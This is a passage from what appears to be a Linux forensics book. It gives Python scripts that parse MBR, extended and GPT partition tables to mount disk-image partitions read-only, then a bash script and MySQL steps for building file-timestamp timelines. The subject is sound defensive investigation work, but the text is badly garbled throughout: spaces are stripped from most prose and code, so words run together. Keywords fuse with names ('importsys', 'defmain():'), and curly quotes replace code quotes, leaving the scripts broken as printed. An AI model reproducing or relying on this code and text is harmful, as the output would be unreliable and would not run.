createsalistcontainingthefourpartitionentries.NoticethatIsaidlinenotlines.The“\”attheendofthefirstlineisalinecontinuationcharacter.ThisisusedtomakethingsmorereadablewithoutviolatingPython’sindentationrules.
AtthispointImustconfesstoawhitelieItoldearlierinthischapter.Pythondoesnothavearrays.Rather,Pythonhastwothingsthatlooklikearrays:listsandtuples.Tocreatea list inPython simplyenclose the list items in squarebrackets and separate themwithcommas. The list we have described here is mutable (its values can be changed).Enclosing items in parentheses creates a tuple which is used in the same way, but isimmutable.Somereadersmaybefamiliarwitharraysinother languages.Unlikearrays,itemsinalistortuplecanbeofdifferenttypesinPython.
Oncewehavethelistofpartitions,weiterateoverthelistinthefollowingforloop:forpinparts:
p.printPart()
ifnotp.empty:
notsupParts=[0x05,0x0f,0x85,0x91,0x9b,0xc5,0xe4,0xee]
ifp.typeinnotsupParts:
print(“SorryGPTandextendedpartitions“+\
“arenotsupportedbythisscript!”)
else:
mountpath=‘/media/part%s’%str(p.partno)
#iftheappropriatedirectorydoesn’texistcreateit
ifnotos.path.isdir(mountpath):
subprocess.call([‘mkdir’,mountpath])
mountopts=‘loop,ro,noatime,offset=%s’%str(p.start*512)
subprocess.call([‘mount’,‘-o’,mountopts,sys.argv[1],mountpath])
Let’s break down thisfor loop. The lineforpinparts: starts a for loopblock.ThiscausesthePythoninterpretertoiterateoverthepartslistsettingthevariablepto point to the current item in parts with each iteration. We start by printing out thepartitionentryusingp.printPart(). If the entry is not emptyweproceedwithourattemptstomountit.
Wecreateanotherlist,notsupParts,andfillitwithpartitiontypesthatarenotsupportedby thisscript.Next,wecheck tosee if thecurrentpartition’s type is in the listwithifp.typeinnotsupParts:.Ifitisinthelist,weprintasorrymessage.Otherwise(else:)wecontinuewithourmountingprocess.
Thelinemountpath=‘/media/part%s’%str(p.partno)usesapopularPython construct to build a string. The general format of this construct is “somestringcontainingplaceholders”%<listortupleofstrings>.For example, ‘Hello %s, My name is %s’ % (‘Bob’, ‘Phil’) wouldevaluate to the string ‘Hello Bob, My name is Phil’. The line in our code causesmountpath to be assigned the value of ‘/media/part0’, ‘/media/part1’, ‘/media/part2’, or‘/media/part3’.
Thelineifnotos.path.isdir(mountpath):checksfortheexistenceofthismountpathdirectory. If it doesn’t exist it is createdon thenext line.Thenext lineusessubprocess.call()tocallanexternalprogramorcommand.Thisfunctionexpectsalistcontainingtheprogramtoberunandanyarguments.
On thenext line the string substitutionconstruct isusedonceagain to create a stringwith options for the mount command complete with the appropriate offset. Note thatstr(p.start*512)isusedtofirstcomputethisoffsetandthenconvertitfromanumeric value to a string as required by the % operator. Finally, we usesubprocess.call()torunthemountcommand.
Onlyone thingremains in thescript that requiresexplanation,and that is the last twolines.Thetestif__name__==“__main__”: isacommontrickused inPythonscripting. If the script is executed the variable __name__ is set to “__main__”. If,however,thescriptismerelyimportedthisvariableisnotset.ThisallowsthecreationofPythonscriptsthatcanbothberunandimportedintootherscripts(therebyallowingcodetobereused).
If you are new to Python youmightwant to take a break at this point afterwalkingthroughourfirstscript.Youmightwanttorereadthissectionifyouarestillabituncertainabouthowthisscriptworks.Restassuredthatthingswillbeabiteasieraswepressonanddevelopnewscripts.
The results of running our script against an image file from aWindows system areshowninFigure5.12.Figure5.13depictswhathappenswhenrunningthescriptagainstanimagefromanUbuntu14.04system.
FIGURE5.12
RunningthePythonmountingscriptagainstanimagefilefromaWindowssystem.
FIGURE5.13
RunningthePythonmountingscriptagainstanimagefilefromanUbuntu14.04system.
MBR-basedextendedpartitionsThe following script will attempt to mount anything in extended partitions that wereskippedoverinthepreviousscript:#!/usr/bin/python
#
#mount-image-extpart.py
#
#ThisisasimplePythonscriptthatwill
#attempttomountpartitionsinsideanextended
#partitionfromanimagefile.
#Imagesaremountedread-only.
#
#DevelopedbyDr.PhilPolstra(@ppolstra)
#forPentesterAcademy.com
importsys
importos.path
importsubprocess
importstruct
“””
ClassMbrRecord:decodesapartitionrecordfromaMasterBootRecord
Usage:rec=MbrRecord(sector,partno)where
sectoristhe512byteorgreatersectorcontainingtheMBR
partnoisthepartitionnumber0-3ofinterest
rec.printPart()printspartitioninformation
“””
classMbrRecord():
def__init__(self,sector,partno):
self.partno=partno
#firstrecordatoffset446&recordsare16bytes
offset=446+partno*16
self.active=False
#firstbyte==0x80meansactive(bootable)
ifsector[offset]==‘\x80’:
self.active=True
self.type=ord(sector[offset+4])
self.empty=False
#partitiontype==0meansitisempty
ifself.type==0:
self.empty=True
#sectorvaluesare32-bitandstoredinlittleendianformat
self.start=struct.unpack(‘<I’,sector[offset+8:\
offset+12])[0]
self.sectors=struct.unpack(‘<I’,sector[offset+12:\
offset+16])[0]
defprintPart(self):
ifself.empty==True:
print(“<empty>”)
else:
outstr=“”
ifself.active==True:
outstr+=“Bootable:”
outstr+=“Type“+str(self.type)+“:”
outstr+=“Start“+str(self.start)+“:”
outstr+=“Totalsectors“+str(self.sectors)
print(outstr)
defusage():
print(“usage“+sys.argv[0]+“<imagefile>\n”+\
“Attemptstomountextendedpartitionsfromanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<2:
usage()
#onlyextendedpartitionswillbeprocessed
extParts=[0x05,0x0f,0x85,0x91,0x9b,0xc5,0xe4]
#swappartionswillbeignored
swapParts=[0x42,0x82,0xb8,0xc3,0xfc]
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopenedforreading”)
exit(1)
withopen(sys.argv[1],‘rb’)asf:
sector=str(f.read(512))
if(sector[510]==“\x55”andsector[511]==“\xaa”):
print(“LookslikeaMBRorVBR”)
#ifitisanMBRbytes446,462,478,and494mustbe0x80or0x00
if(sector[446]==‘\x80’orsector[446]==‘\x00’)and\
(sector[462]==‘\x80’orsector[462]==‘\x00’)and\
(sector[478]==‘\x80’orsector[478]==‘\x00’)and\
(sector[494]==‘\x80’orsector[494]==‘\x00’):
print(“MustbeaMBR”)
parts=[MbrRecord(sector,0),MbrRecord(sector,1),\
MbrRecord(sector,2),MbrRecord(sector,3)]
forpinparts:
p.printPart()
ifnotp.empty:
#ifitisn’tanextendedpartitionignoreit
ifp.typeinextParts:
print(“Foundanextendedpartitionatsector%s”\
%str(p.start))
bottomOfRabbitHole=False
extendPartStart=p.start
extPartNo=5
whilenotbottomOfRabbitHole:
#getthelinkedlistMBRentry
withopen(sys.argv[1],‘rb’)asf:
f.seek(extendPartStart*512)
llSector=str(f.read(512))
extParts=[MbrRecord(llSector,0),
MbrRecord(llSector,1)]
#tryandmountthefirstpartition
ifextParts[0].typeinswapParts:
print(“Skippingswappartition”)
else:
mountpath=‘/media/part%s’%str(extPartNo)
ifnotos.path.isdir(mountpath):
subprocess.call([‘mkdir’,mountpath])
mountopts=‘loop,ro,noatime,offset=%s’\
%str((extParts[0].start+extendPartStart)*512)
print(“Attemptingtomountextendparttype%sat
sector%s”\
%(hex(extParts[0].type),\
str(extendPartStart+extParts[0].start)))
subprocess.call([‘mount’,‘-o’,mountopts,\
sys.argv[1],mountpath])
ifextParts[1].type==0:
bottomOfRabbitHole=True
print(“Foundthebottomoftherabbithole”)
else:
extendPartStart+=extParts[1].start
extPartNo+=1
if__name__==“__main__”:
main()
This script starts out very similar to the previous script until we get into the mainfunction.Thefirstdifferenceisthedefinitionoftwolists:extPartsandswapPartsthatlistextendedpartitionandswappartitiontypes,respectively.WethenreadtheMBRasbeforeand verify that it looks like an MBR should. Things really start to diverge from thepreviousscriptatthefollowinglines:ifp.typeinextParts:
print(“Foundanextendedpartitionatsector%s”\
%str(p.start))
bottomOfRabbitHole=False
extendPartStart=p.start
extPartNo=5
Intheselineswechecktoseeifwehavefoundanextendedpartition.Ifsoweprintamessageandsetafewvariables.ThefirstvariablenamedbottomOfRabbitHole isset tofalse.Thisvariable isused to indicatewhenwehave found the lowest level in a setofnestedextendedpartitions.Thestartsectorof theprimaryextendedpartitionisstoredinextendPartStart. This is necessary because addresses inside an extended partition arerelativetotheextendedpartition,butweneedabsoluteaddressestomountthepartition(s).Finally,wesetavariableextPartNoequalto5whichistraditionallyusedasthepartitionnumberforthefirstlogicalpartitionwithinanextendedpartition.
ThelinewhilenotbottomOfRabbitHole:beginsawhileloop.Awhileloopisexecutedaslongastheconditionlistedinthewhileloopistrue.Withinthewhileloopwe use ourwithopen construct as before to read themini-MBR at the start of theextended partition with one small addition to the previous script. The linef.seek(extendPartStart*512)isnew.Becausethemini-MBRisnotlocatedatthestartofthefile(LBA0)wemustseekaheadtotheappropriateplace.Theoffsetweneedisjustthesectornumbermultipliedbythesizeofasector(512).
Nextwereadthefirsttwoentriesinthemini-MBRintoalist,extParts.Ifthefirstentry(extParts[0]) is a swap partition, we skip it. Otherwise we attempt to mount it. Themountingcodeisthesameasthatfoundinthepreviousscript.
Wethencheckthesecondentryinthemini-MBR(extParts[1]).Ifitstypeis0x00,thereare no nested extended partitions and we are done. If this is not the case we add thestartingsectorofthenestedextendedpartitiontoextendPartStartandincrementextPartNosothingsaresetupproperlyforournextiterationofthewhileloop.
GPTpartitionsNowthatwehavecoveredsystemsusingthelegacyMBR-basedmethodofpartition,let’smoveontoGUID-basedpartitions.Hopefullywithinthenextfewyearsthiswillbecometheonlysystemyouhavetohandleduringyourinvestigations.AsIsaidpreviously,thisnew system is much more straightforward and elegant. Our script for automaticallymountingthesepartitionsfollows.#!/usr/bin/python
#
#mount-image-gpt.py
#
#ThisisasimplePythonscriptthatwill
#attempttomountpartitionsfromanimagefile.
#ThisscriptisforGUIDpartitionsonly.
#Imagesaremountedread-only.
#
#DevelopedbyDr.PhilPolstra(@ppolstra)
#forPentesterAcademy.com
importsys
importos.path
importsubprocess
importstruct
#GUIDsforsupportedpartitiontypes
supportedParts=[“EBD0A0A2-B9E5-4433-87C0-68B6B72699C7”,
“37AFFC90-EF7D-4E96-91C3-2D7AE055B174”,
“0FC63DAF-8483-4772-8E79-3D69D8477DE4”,
“8DA63339-0007-60C0-C436-083AC8230908”,
“933AC7E1-2EB4-4F13-B844-0E14E2AEF915”,
“44479540-F297-41B2-9AF7-D131D5F0458A”,
“4F68BCE3-E8CD-4DB1-96E7-FBCAF984B709”,
“B921B045-1DF0-41C3-AF44-4C6F280D3FAE”,
“3B8F8425-20E0-4F3B-907F-1A25A76F98E8”,
“E6D6D379-F507-44C2-A23C-238F2A3DF928”,
“516E7CB4-6ECF-11D6-8FF8-00022D09712B”,
“83BD6B9D-7F41-11DC-BE0B-001560B84F0F”,
“516E7CB5-6ECF-11D6-8FF8-00022D09712B”,
“85D5E45A-237C-11E1-B4B3-E89A8F7FC3A7”,
“516E7CB4-6ECF-11D6-8FF8-00022D09712B”,
“824CC7A0-36A8-11E3-890A-952519AD3F61”,
“55465300-0000-11AA-AA11-00306543ECAC”,
“516E7CB4-6ECF-11D6-8FF8-00022D09712B”,
“49F48D5A-B10E-11DC-B99B-0019D1879648”,
“49F48D82-B10E-11DC-B99B-0019D1879648”,
“2DB519C4-B10F-11DC-B99B-0019D1879648”,
“2DB519EC-B10F-11DC-B99B-0019D1879648”,
“49F48DAA-B10E-11DC-B99B-0019D1879648”,
“426F6F74-0000-11AA-AA11-00306543ECAC”,
“48465300-0000-11AA-AA11-00306543ECAC”,
“52414944-0000-11AA-AA11-00306543ECAC”,
“52414944-5F4F-11AA-AA11-00306543ECAC”,
“4C616265-6C00-11AA-AA11-00306543ECAC”,
“6A82CB45-1DD2-11B2-99A6-080020736631”,
“6A85CF4D-1DD2-11B2-99A6-080020736631”,
“6A898CC3-1DD2-11B2-99A6-080020736631”,
“6A8B642B-1DD2-11B2-99A6-080020736631”,
“6A8EF2E9-1DD2-11B2-99A6-080020736631”,
“6A90BA39-1DD2-11B2-99A6-080020736631”,
“6A9283A5-1DD2-11B2-99A6-080020736631”,
“75894C1E-3AEB-11D3-B7C1-7B03A0000000”,
“E2A1E728-32E3-11D6-A682-7B03A0000000”,
“BC13C2FF-59E6-4262-A352-B275FD6F7172”,
“42465331-3BA3-10F1-802A-4861696B7521”,
“AA31E02A-400F-11DB-9590-000C2911D1B8”,
“9198EFFC-31C0-11DB-8F78-000C2911D1B8”,
“9D275380-40AD-11DB-BF97-000C2911D1B8”,
“A19D880F-05FC-4D3B-A006-743F0F84911E”]
#simplehelpertoprintGUIDs
#notethattheyarebothlittle/bigendian
defprintGuid(packedString):
iflen(packedString)==16:
outstr=format(struct.unpack(‘<L’,\
packedString[0:4])[0],‘X’).zfill(8)+“-”+\
format(struct.unpack(‘<H’,\
packedString[4:6])[0],‘X’).zfill(4)+“-”+\
format(struct.unpack(‘<H’,\
packedString[6:8])[0],‘X’).zfill(4)+“-”+\
format(struct.unpack(‘>H’,\
packedString[8:10])[0],‘X’).zfill(4)+“-”+\
format(struct.unpack(‘>Q’,\
“\x00\x00”+packedString[10:16])[0],‘X’).zfill(12)
else:
outstr=“<invalid>”
returnoutstr
“””
ClassGptRecord
ParsesaGUIDPartitionTableentry
Usage:rec=GptRecord(recs,partno)
whererecsisastringcontainingall128GPTentries
andpartnoisthepartitionnumber(0-127)ofinterest
rec.printPart()printspartitioninformation
“””
classGptRecord():
def__init__(self,recs,partno):
self.partno=partno
offset=partno*128
self.empty=False
#buildpartitiontypeGUIDstring
self.partType=printGuid(recs[offset:offset+16])
ifself.partType==\
“00000000-0000-0000-0000-000000000000”:
self.empty=True
self.partGUID=printGuid(recs[offset+16:offset+32])
self.firstLBA=struct.unpack(‘<Q’,\
recs[offset+32:offset+40])[0]
self.lastLBA=struct.unpack(‘<Q’,\
recs[offset+40:offset+48])[0]
self.attr=struct.unpack(‘<Q’,\
recs[offset+48:offset+56])[0]
nameIndex=recs[offset+56:offset+128].find(‘\x00\x00’)
ifnameIndex!=-1:
self.partName=\
recs[offset+56:offset+56+nameIndex].encode(‘utf-8’)
else:
self.partName=\
recs[offset+56:offset+128].encode(‘utf-8’)
defprintPart(self):
ifnotself.empty:
outstr=str(self.partno)+“:”+self.partType+\
“:”+self.partGUID+“:”+str(self.firstLBA)+\
“:”+str(self.lastLBA)+“:”+\
str(self.attr)+“:”+self.partName
print(outstr)
“””
ClassMbrRecord:decodesapartitionrecordfromaMasterBootRecord
Usage:rec=MbrRecord(sector,partno)where
sectoristhe512byteorgreatersectorcontainingtheMBR
partnoisthepartitionnumber0-3ofinterest
rec.printPart()printspartitioninformation
“””
classMbrRecord():
def__init__(self,sector,partno):
self.partno=partno
#firstrecordatoffset446&recordsare16bytes
offset=446+partno*16
self.active=False
#firstbyte==0x80meansactive(bootable)
ifsector[offset]==‘\x80’:
self.active=True
self.type=ord(sector[offset+4])
self.empty=False
#partitiontype==0meansitisempty
ifself.type==0:
self.empty=True
#sectorvaluesare32-bitandstoredinlittleendianformat
self.start=struct.unpack(‘<I’,sector[offset+8:\
offset+12])[0]
self.sectors=struct.unpack(‘<I’,sector[offset+12:\
offset+16])[0]
defprintPart(self):
ifself.empty==True:
print(“<empty>”)
else:
outstr=“”
ifself.active==True:
outstr+=“Bootable:”
outstr+=“Type“+str(self.type)+“:”
outstr+=“Start“+str(self.start)+“:”
outstr+=“Totalsectors“+str(self.sectors)
print(outstr)
defusage():
print(“usage“+sys.argv[0]+\
“<imagefile>\nAttemptstomountpartitionsfromanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<2:
usage()
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopennedforreading”)
exit(1)
withopen(sys.argv[1],‘rb’)asf:
sector=str(f.read(512))
if(sector[510]==“\x55”andsector[511]==“\xaa”):
#ifitisanMBRbytes446,462,478,and494mustbe0x80or0x00
if(sector[446]==‘\x80’orsector[446]==‘\x00’)and\
(sector[462]==‘\x80’orsector[462]==‘\x00’)and\
(sector[478]==‘\x80’orsector[478]==‘\x00’)and\
(sector[494]==‘\x80’orsector[494]==‘\x00’):
part=MbrRecord(sector,0)
ifpart.type!=0xee:
print(“FailedprotectiveMBRsanitycheck”)
exit(1)
#checktheheaderasanothersanitycheck
withopen(sys.argv[1],‘rb’)asf:
f.seek(512)
sector=str(f.read(512))
ifsector[0:8]!=“EFIPART”:
print(“YouappeartobemissingaGUIheader”)
exit(1)
print(“ValidprotectiveMBRandGUIpartiontableheaderfound”)
withopen(sys.argv[1],‘rb’)asf:
f.seek(1024)
partRecs=str(f.read(512*32))
parts=[]
foriinrange(0,128):
p=GptRecord(partRecs,i)
ifnotp.empty:
p.printPart()
parts.append(p)
forpinparts:
ifp.partTypeinsupportedParts:
print(“Partition%sseemstobesupportedattemptingtomount”\
%str(p.partno))
mountpath=‘/media/part%s’%str(p.partno)
ifnotos.path.isdir(mountpath):
subprocess.call([‘mkdir’,mountpath])
mountopts=‘loop,ro,noatime,offset=%s’%\
str(p.firstLBA*512)
subprocess.call([‘mount’,‘-o’,mountopts,\
sys.argv[1],mountpath])
if__name__==“__main__”:
main()
Let’swalkthroughthiscode.Itbeginswith thenormalshe-bang.Thenweimport thesamefourlibrariesasinthepreviousscripts.Nextwedefineaverylonglistofsupportedpartitiontypes.Asyoucanseefromthislist,Linuxsupportsmostanypartitiontype.
WedefineasimplehelperfunctiontoprinttheGUIDsfromthepackedstringsusedtostoretheGPTentriesontheselines:defprintGuid(packedString):
iflen(packedString)==16:
outstr=format(struct.unpack(‘<L’,\
packedString[0:4])[0],‘X’).zfill(8)+“-”+\
format(struct.unpack(‘<H’,\
packedString[4:6])[0],‘X’).zfill(4)+“-”+\
format(struct.unpack(‘<H’,\
packedString[6:8])[0],‘X’).zfill(4)+“-”+\
format(struct.unpack(‘>H’,\
packedString[8:10])[0],‘X’).zfill(4)+“-”+\
format(struct.unpack(‘>Q’,\
“\x00\x00”+packedString[10:16])[0],‘X’).zfill(12)
else:
outstr=“<invalid>”
returnoutstr
This helper function uses the samestruct.unpackmethod found in the previousscripts.Onedifferenceisthatthefirst threepartsoftheGUIDarestoredinlittleendianformat and the last two are big endian. That is why the first three calls tostruct.unpackhave‘<’intheirformatstringsandthelasttwohave‘>’.Also,thelastcalltounpackmightlookabitstrange.AllthatI’vedonehereisaddtwobytesofleadingzerostothevaluebecausethereisnounpackformatspecifierfora6-bytevalue,butthereisoneforan8-bytevalue.
We have introduced a new function, format, in this helper function. As the nameimplies,format is used to print values in a specified way. Our chosen format, ‘X’,specifieshexadecimalwithuppercaseletters.Oncewehaveastringcontainingourvaluewe runzfill() on the string to add leading zeros in order for our GUIDs to printcorrectly. As a simple example, the expression format(struct.unpack(‘<L’,‘\x04\x00\x00\x00’)[0], ‘X’).zfill(8) evaluates to the string“00000004”.
Next we define a GptRecord class that acts just like the MbrRecord class from thepreviousscripts.Itexpectsalistofpartitiontableentries(all128ofthem)andanindexintothetableasinputs.Onlythefollowinglinesrequireanyexplanationinthisclass:nameIndex=recs[offset+56:offset+128].find(‘\x00\x00’)
ifnameIndex!=-1:
self.partName=\
recs[offset+56:offset+56+nameIndex].encode(‘utf-8’)
else:
self.partName=\
recs[offset+56:offset+128].encode(‘utf-8’)
Whyare these lineshere? Ihave found that sometimesUnicodestringssuchas thoseusedtostorethepartitionnameintheGPTarenull-terminated(with0x000x00)andtheremay be random junk after the terminating null character. The first line in this codefragmentusesfindtoseeifthereisanullcharacterinthename.Ifthestringisfound,thennameIndexissettoitsposition.Ifthestringisnotfound,thefindfunctionreturns-1.Lookingattheifblockyouwillseethatifanullwasfound,weonlyusecharactersbeforeittostorethepartitionname.Otherwisewestoreallofthename.
TheMbrRecord class still hasn’t gone away.This class is used to read theprotectiveMBRasasanitycheck.Youwillseethatthemainfunctionstartsoutthesameasbeforeby reading the first sector and using MbrRecord to parse it. The second sanity checkcausesthescripttoexitifthefirstpartitionisnottype0xEE,whichindicatesaGPTdrive.
The third sanity check reads theGPTheader in the second sector and checks for thestring“EFIPART”whichshouldbestoredinthefirsteightbytesofthissector.Ifthisfinalcheck passes, the image is reopened and the next 32 sectors containing the 128 GPTentriesareread.
Wethenhaveanewkindofforloopinthiscode:foriinrange(0,128):
p=GptRecord(partRecs,i)
ifnotp.empty:
p.printPart()
parts.append(p)
Nowinsteadofiteratingoveralistortupleweareusinganexplicitrangeofnumbers.Itturnsoutthatwearestilliteratingoveratuple.Therange(n,m)functioninPythoncreatesatuple(immutablelist)ofintegersintherange[n,m).Thisiswhatiscommonlycalledahalfopenrange.Thenisincludedintherange(hence‘[‘onthatend)andthemisnot(asdenotedby‘)’onthatend).Forexample,range(0,5)evaluatestothetuple(0,1,2,3,4).Non-emptypartitionsareprintedandadded to theparts list.YoumaybewonderingwhyIdon’tstoponceanemptyrecordhasbeenencountered.Itisvalid,thoughsomewhatunusual,tohaveemptyentriesinthemiddleoftheGPT.
OncetheentireGPThasbeenparsedweiterateoverthepartslistandattempttomountany supported partitions. The methods used are the same as those from the previousmounting scripts. The results of running this script against an image using GUIDpartitionsisshowninFigure5.14.Notethatthisscriptwasintentionallyrunwithoutrootprivilegessothatthemountswouldfailastheimageusedwascorrupted.
FIGURE5.14
Mounting GUID-based partitions from an image file. Note: the script was intentionally run without rootprivilegestopreventmountingofanimagethatwascorrupted.
SUMMARYWe have covered a lot of ground in this chapter.We discussed the basics ofmountingdifferenttypesofpartitionsfoundinimagefiles.SomereadersmayhavelearnedalittlePython along the ways as we discussed how Python could be used to automate thisprocess.Inthenextchapterwewilldiscussinvestigatingthefilesystem(s)mountedfromyourdiskimage.
CHAPTER
6AnalyzingMountedImagesINFORMATIONINTHISCHAPTER:
GettingmetadatafromanimageUsingLibreOfficeinaninvestigationUsingMySQLinaninvestigationCreatingtimelinesExtractingbashhistoriesExtractingsystemlogsExtractingloginsandloginattempts
GETTINGMODIFICATION,ACCESS,ANDCREATIONTIMESTAMPSNowthatyouhavean imagemounted, the full setofLinuxsystemtools isavailable toyou.Oneofthefirstthingsyoumightwanttodoiscreateatimeline.Ataminimumyouwillwanttocheckalloftheusualdirectoriesthatattackerstargetsuchas/sbinand/bin.Naturally,wecanstillusesomescripting tohelpwith theprocess.The followingscriptwill extractmodification, access, and creation (MAC) times and othermetadata from agivendirectoryandoutputtheinformationinsemicolonseparatedvaluesforeasyimportintoaspreadsheetordatabase.#!/bin/bash
#
#getmacs.sh
#
#SimpleshellscripttoextractMACtimesfromanimageto
#aCSVfileforimportintoaspreadsheetordatabase.
#
#DevelopedforPentesterAcademyby
#Dr.PhilPolstra(@ppolstra)
usage(){
echo“usage:$0<startingdirectory>”
echo“SimplescripttogetMACtimesfromanimageandoutputCSV”
exit1
}
if[$#-lt1];then
usage
fi
#semicolondelimitedfilewhichmakesimporttospreadsheeteasier
#printfisaccessdate,accesstime,modifydate,modifytime,
#createdate,createtime,permissions,userid,username,
#groupid,groupname,filesize,filenameandthenlinefeed
olddir=$(pwd)
cd$1#thisavoidshavingthemountpointaddedtoeveryfilename
printf“AccessDate;AccessTime;ModifyDate;ModifyTime;CreateDate;\
CreateTime;Permissions;UserID;GroupID;FileSize;Filename\n”
find./-printf“%Ax;%AT;%Tx;%TT;%Cx;%CT;%m;%U;%G;%s;%p\n”
cd$olddir
Thescriptisstraightforwardandcontainsnonewtechniquespreviouslyundiscussedinthisbook.Theonethingyoumightbecuriousaboutissavingthecurrentdirectorywitholddir=$(pwd),changingtothespecifieddirectory,andthenchangingbackwithcd$olddir at the end. This is done to prevent the full path (including themount pointspecified)frombeingaddedtothefrontofeachfilenameintheoutput.
Partial resultsof running this scriptagainsta subject systemareshown inFigure6.1.Normally youwill want to capture the results to a file usinggetmacs.sh {mountpoint of subject filesystem} > {output file}. For example,getmacs.sh/media/part0>pfe1.csv.
FIGURE6.1
Gettingmetadataforinputtoaspreadsheetordatabase.
IMPORTINGINFORMATIONINTOLIBREOFFICETheoutput from theprevious script is easily imported intoLibreOfficeCalcor anotherspreadsheet.Simplyopen thesemicolon-separated file.Youwillneed tospecifywhat isusedtoseparatethevalues(asemicolonforus)andshouldalsoselecttheformatusedforthedatecolumnsasshowninFigure6.2.
FIGURE6.2
Importing a semicolon-seperated file into LibreOffice. Note that the date columns should be formatted asdatesasshown.
Thespreadsheetiseasilysortedbyanyofthedatesandtimes.Tosortthespreadsheetselect the columns to be sorted and then select sort from the data menu. You will begreetedwithascreensuchasthatshowninFigure6.3.
FIGURE6.3
Sortingthespreadsheetbyaccesstimes.
Afterwehavesortedthespreadsheetitismucheasiertoseerelatedactivities,oratleastthefilesthathavebeenaccessedaroundthesametime,possiblyrelatedtoactionsbyanattacker.Thehighlightedrows inFigure6.4showarootkit thatwasdownloadedby thejohnaccountbeingaccessed.
FIGURE6.4
Aftersortingthespreadsheetbyaccesstimesthedownloadandinstallationofarootkitiseasilyseen.
IMPORTINGDATAINTOMySQLImportingourdataintoaspreadsheetisaneasyprocess.Itdoessufferwhenitcomestoperformanceifthesubjectfilesystemislarge,however.Thereisanotherlimitationofthismethod aswell. It is not easy tomake a true timelinewheremodification, access, andcreationtimesareallpresentedonasingletimeline.YoucouldcreateabodyfileforusewithAutopsy,butIhavefoundthattheperformanceisstilllackingandthisisnotnearlyasflexibleashavingeverythinginaproperdatabase.
IfyoudonotalreadyhaveMySQLinstalledonyour forensicsworkstation, it isquitesimple to add. For Debian and Ubuntu based systems sudo apt-get installmysql-servershouldbeallyouneed.OnceMySQLhasbeeninstalledyouwillwantto create a database.Tokeep things clean, I recommendyou create a newdatabase foreachcase.Thecommandtocreateanewdatabaseissimplymysqladmin-u<user>-pcreate<databasename>. For example, if I want to login as the root user(whichisnotnecessarilythesameastherootuseronthesystem)andcreateadatabaseforcase-pfe1Iwouldtypemysqladmin-uroot-pcreatecase-pfe1.The-poptionmeanspleasepromptmeforapassword(passingitinonthecommandlinewouldbeverybadsecurityasthiscouldbeinterceptedeasily).TheuserlogininformationshouldhavebeensetupwhenMySQLwasinstalled.
Onceadatabasehasbeencreatedit is timetoaddsometables.TheeasiestwaytodothisistostarttheMySQLclientusingmysql-u<user>-p,i.e.mysql-uroot-p. You are not yet connected to your database. To remedy that situation issue thecommandconnect<database>intheMySQLclientshell.Forexample,inmycaseI would type connect case-pfe1. Logging in to MySQL and connecting to adatabaseisshowninFigure6.5.
FIGURE6.5
LogginginwiththeMySQLclientandconnectingtoadatabase.
The following SQL codewill create a database table that can be used to import thesemicolon-separated values in the file generated by our shell script. This scriptmay besavedtoafileandexecutedintheMySQLclient.ItisalsojustaseasytocutandpastitintoMySQL.createtablefiles(
AccessDatedatenotnull,
AccessTimetimenotnull,
ModifyDatedatenotnull,
ModifyTimetimenotnull,
CreateDatedatenotnull,
CreateTimetimenotnull,
Permissionssmallintnotnull,
UserIdsmallintnotnull,
GroupIdsmallintnotnull,
FileSizebigintnotnull,
Filenamevarchar(2048)notnull,
recnobigintnotnullauto_increment,
primarykey(recno)
);
Wecanseethatthisisafairlysimpletable.Allofthecolumnsaredeclared‘notnull’meaning that they cannot be empty. For readers not familiarwithMySQL the last two
linesmightrequiresomeexplanation.Thefirstcreatesacolumn,recno,whichisa longintegerandsetsittoautomaticallyincrementaninternalcountereverytimeanewrowisinserted.On the next line recno is set as the primary key. The primary key is used forsortingandquicklyretrievinginformationinthetable.
CreatingthistableisshowninFigure6.6.NoticethatMySQLreports0rowsaffectedwhichiscorrect.Addingatabledoesnotcreateanyrows(records)init.
FIGURE6.6
CreateaTabletostorefilemetadatainMySQL.
Now that there is aplace fordata togo, the information fromour shell script canbeimported. MySQL has a load data infile command that can be used for thispurpose. There is a small complication that must be worked out before running thiscommand.Thedatestrings in the filemustbeconverted toproperMySQLdateobjectsbefore insertion in the database. This is what is happening in the set clause of thefollowingscript.Thereisalsoalinethatreadsignore1rowswhichtellsMySQLtoignoretheheadersatthetopofourfilethatexisttomakeaspreadsheetimporteasier.loaddatainfile‘/tmp/case-pfe1.csv’
intotablefiles
fieldsterminatedby‘;’
enclosedby‘”’
linesterminatedby‘\n’
ignore1rows
(@AccessDate,AccessTime,@ModifyDate,ModifyTime,@CreateDate,\
CreateTime,Permissions,UserId,GroupId,FileSize,Filename)
setAccessDate=str_to_date(@AccessDate,“%m/%d/%Y”),
ModifyDate=str_to_date(@ModifyDate,“%m/%d/%Y”),
CreateDate=str_to_date(@CreateDate,“%m/%d/%Y”);
ThefiletobeimportedmustbeinanapproveddirectoryorMySQLwillignoreit.Thisisasecuritymeasure.Thiswouldprevent,amongotherthings,anattackerwhoexploitsaSQL vulnerability on a website from uploading a file to be executed, assuming thatMySQL won’t accept files from any directory accessible by the webserver. You couldchange the listofdirectories in theMySQLfiles,but it isprobablysimpler to justcopyyourfileto/tmpfortheimportasIhavedone.
LoadingfilemetadatafromthePFEsubjectsystemisshowninFigure6.7.Noticethatmylaptopwasabletoinsert184,601rowsinonly5.29seconds.Thewarningsconcernthedateimports.Asweshallsee,allofthedateswereproperlyimported.
FIGURE6.7
LoadingfilemetadataintoMySQL.
Oncethedataisimportedyouarefreetoqueryyouronetabledatabasetoyourheart’scontent.Forexample,togetthese184,601filessortedbyaccesstimeindescendingorder(so the latest activity is on the top) simply run the queryselect*fromfilesorderbyaccessdatedesc,accesstimedesc;.TheresultsofrunningthisqueryareshowninFigure6.8.Notethatretrieving184,601sortedrowsrequiredamere0.71 secondsonmy laptop. Ifyouprefer anascending sort justomit ‘desc’ in theSQLqueryabove.
FIGURE6.8
UsingMySQLtosortfilemetadatabyaccesstime.
